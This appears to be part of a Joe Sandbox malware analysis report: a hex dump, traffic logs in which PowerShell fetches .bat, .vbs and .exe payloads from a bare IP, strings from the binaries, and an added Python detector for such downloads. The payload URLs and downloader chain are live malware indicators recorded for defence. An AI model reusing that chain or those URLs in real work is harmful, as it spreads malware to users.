8d 01 00 00 a0 01 00 00 8e 01 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec 81 ec 00 09 00 00 53 56 57 6a 27 e8 8a 0f 00 00 8b 75 08 ff 76 0c 8b 3d 60 32 41 00 ff 36 50 8d 85 00 f7 ff ff 50 
ff d7 83 65 08 00 83 c4 14 83 7e 10 00 76 38 8d 5e 14 ff 33 8d 85 00 ff ff ff 68 10 33 41 00 50 ff d7 83 c4 0c 8d 85 00 ff ff ff 50 8d 85 00 f7 ff ff 50 ff 15 70 31 41 00 ff 45 08 8b 45 08 83 c3 04 3b 46 10 72 cb 8d 85 00 f7 ff ff 50 e8 2c 66 00 00 59 e8 8b 2d 00 00 6a 0a ff 15 74 31 41 00 cc ff 74 24 04 e8 6c ff ff ff cc 33 c0 39 05 e4 77 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 dc 77 41 00 ff 15 f4 32 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 18 00 83 7c 24 08 00 75 07 c7 40 18 01 00 00 00 33 c0 c2 08 00 8b 44 24 04 85 c0 56 8b f1 89 06 74 06 8b 08 50 ff 51 04 8b c6 5e c2 04 00 8b 54 24 04 56 8b 74 24 0c 8b c2 0f b7 0e 66 89 0a 42 42 46 46 66 85 c9 75 f1 5e c3 8b 4c 24 04 33 c0 66 39 01 74 08 40 66 83 3c 41 00 75 f8 c3 53 8b 5c 24 08 56 8b f1 43 3b 5e 08 74 4c 57 33 c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 b4 0a 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 88 0a 01 00 59 8b 46 04 89 3e 66 83 24 47 00
Source: Joe Sandbox View ASN Name: VOXILITYGB VOXILITYGB
Source: global traffic HTTP traffic detected: GET /hello.bat HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 172.94.3.25 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ffo.bat HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 172.94.3.25 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hi.vbs HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 172.94.3.25 | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /AUGUST.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 172.94.3.25 | Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.94.3.25 (reported 50 times)
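
The four GETs recorded here are the staging chain: powershell.exe (the user agent "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682" is the default Invoke-WebRequest agent on Windows PowerShell 5.1) fetching .bat, .vbs and .exe files from a bare IP, with no DNS query preceding the connection. The Sigma rules listed in this report ("Suspicious Invoke-WebRequest Execution With DirectIP", "Usage Of Web Request Commands And Cmdlets") match on the process command line at creation time; the block below is an added example, not part of the report or of any Sigma rule, that applies the same three-way test (PowerShell agent, IP-literal Host, script or executable path) to captured HTTP requests, so it can also be run over proxy logs or a PCAP export. The four malicious requests are the ones shown above; the two benign requests and the host names in them are constructed.

```python
"""Flag PowerShell web-request downloads of scripts/executables from bare IPs in
captured HTTP requests. Added example, not the report's or a Sigma rule's code."""
import ipaddress
import re

PS_UA = re.compile(r"WindowsPowerShell/\d")   # default Invoke-WebRequest UA on Windows PowerShell 5.x
# Assumed list of extensions worth alerting on when pulled by a script host.
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".ps1", ".hta",
              ".exe", ".dll", ".scr", ".msi")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request (CRLF line endings) into request line and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def is_bare_ip(host: str) -> bool:
    """True when the Host header is an IP literal (IPv4 or bracketed IPv6), ignoring any port."""
    literal = host[1:host.index("]")] if host.startswith("[") and "]" in host else host.split(":")[0]
    try:
        ipaddress.ip_address(literal)
        return True
    except ValueError:
        return False


def classify(raw: str) -> dict:
    """One request -> severity plus the reasons; 'high' needs the PS agent and at least one more signal."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "")
    path = req["target"].split("?", 1)[0].lower()
    reasons = []
    if PS_UA.search(ua):
        reasons.append("PowerShell web-request user agent")
        if is_bare_ip(host):
            reasons.append("Host is a bare IP (no DNS lookup needed)")
        if path.endswith(SCRIPT_EXT):
            reasons.append("script/executable download: " + path.rsplit(".", 1)[-1])
    severity = "high" if len(reasons) >= 2 else ("low" if reasons else "none")
    return {"url": f"http://{host}{req['target']}", "severity": severity, "reasons": reasons}


def hunt(requests) -> list:
    """Return only the high-severity classifications, in input order."""
    return [r for r in map(classify, requests) if r["severity"] == "high"]


POWERSHELL_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"


def request(path: str, host: str, ua: str = POWERSHELL_UA) -> str:
    return (f"GET {path} HTTP/1.1\r\nUser-Agent: {ua}\r\nHost: {host}\r\n"
            "Connection: Keep-Alive\r\n\r\n")


SAMPLE_REQUESTS = [
    # The four requests recorded in this report.
    request("/hello.bat", "172.94.3.25"),
    request("/ffo.bat", "172.94.3.25"),
    request("/hi.vbs", "172.94.3.25"),
    request("/AUGUST.exe", "172.94.3.25"),
    # Constructed controls: a browser page load and a PowerShell call to an internal API.
    request("/index.html", "www.example.com", ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"),
    request("/api/v1/status", "intranet.example.com"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_REQUESTS):
        print(hit["severity"], hit["url"], "; ".join(hit["reasons"]))
```

The PowerShell agent alone is a weak signal (administrative scripts use Invoke-WebRequest all day), which is why the constructed intranet request only scores "low"; the combination with an IP-literal Host and a script extension is what separates this chain from normal traffic. Operators can set a custom -UserAgent, so treat a missing PowerShell agent as absence of evidence, not as a clean bill.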
Source: DZIPR.exe.17.dr String found in binary or memory: support@datanumen.com+https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm"Total page file memory: %.0n bytes!Free page file memory: %.0n bytes Total virtual memory: %.0n bytes equals www.facebook.com (Facebook)
Source: Dlr7HYI6VL.lnk String found in binary or memory: http://172.94.3.25/hello.bat
Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c0rl.m%L
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: DZIPR.exe.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0L
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://s2.symcb.com0
Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.dr String found in binary or memory: http://support.datanumen.com
Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://sv.symcb.com/sv.crl0a
